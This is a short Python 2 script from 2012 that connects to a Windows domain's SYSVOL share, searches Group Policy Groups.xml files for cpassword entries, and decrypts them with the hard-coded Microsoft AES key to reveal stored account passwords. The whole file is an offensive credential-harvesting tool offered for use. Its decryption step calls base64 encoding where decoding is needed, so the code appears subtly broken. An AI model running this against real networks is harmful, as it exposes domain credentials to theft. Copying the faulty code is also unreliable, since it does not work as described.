gp_password

1. #!/usr/bin/python
2.  
3. """
4. This script allows for you to pull a password that is set by Group Policy out of the policy
5. and decrypt it.  This is based on the following blog post found by Ryan Elkins.
6.  
7. http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
8.  
9. You need to have the following Python Packages installed that are not normally included.
10. smbclient - http://pypi.python.org/pypi/PySmbClient/0.1.1
11. Crypto - https://www.dlitz.net/software/pycrypto/ (This is already installed on Back|Track)
12.  
13. Proper usage: python ./gp_password.py <Server> <Username> <Password> <Domain>
14.  
15. Josh Kelley - 06/19/2012 @winfang98
16. """
17.  
18. import smbclient, sys, base64, binascii, re
19. from Crypto.Cipher import AES
20.  
21. def asciirepl(match):
22.   # replace the hexadecimal characters with ascii characters
23.   s = match.group()  
24.   return binascii.unhexlify(s)  
25.  
26. def reformat_content(data):
27.   p = re.compile(r'\\x(\w{2})')
28.   return p.sub(asciirepl, data)
29.  
30. if len(sys.argv) != 5:
31.     print "Proper usage: python ./gp_password.py <Server> <Username> <Password> <Domain>"
32.     exit()
33.  
34. server = sys.argv[1]
35. username = sys.argv[2]
36. password = sys.argv[3]
37. domain = sys.argv[4]    # Not needed if logging onto the domain controller
38.  
39. smb = smbclient.SambaClient(server=server, share="SYSVOL", username=username, password=password, domain=domain)
40.  
41. key = """4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
42. f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b
43. """.replace(" ","").replace("\n","").decode('hex')
44.  
45. print "[-] Looking for Groups.xml file"
46.  
47. try:
48.     first_dir = smb.listdir("/")
49. except:
50.     print "[!] Cannont login to the server"
51.     exit()
52.  
53. path = "/" + first_dir[0] + "/Policies/"
54.  
55. for policy in smb.listdir(path):
56.     subpolicy = path + policy + "/MACHINE/Preferences/Groups/"
57.     try:
58.         for contents in smb.listdir(subpolicy):
59.             if contents == "Groups.xml":
60.                 file_name = subpolicy + contents               
61.                 print "[-] Found Policy:", file_name               
62.                 f = smb.open(file_name)
63.                 data = f.read()
64.                 s = data.split(" ")
65.                 for a in s:
66.                     if a[:10] == "cpassword=":
67.                         p = a.split("=")
68.                         cpassword = p[1].strip('"') + "="
69.                         o = AES.new(key, 2).decrypt(base64.b64encode(cpassword))
70.                         ascii_string = reformat_content(o)
71.                         print "[-] Password:", ascii_string
72.     except:
73.         pass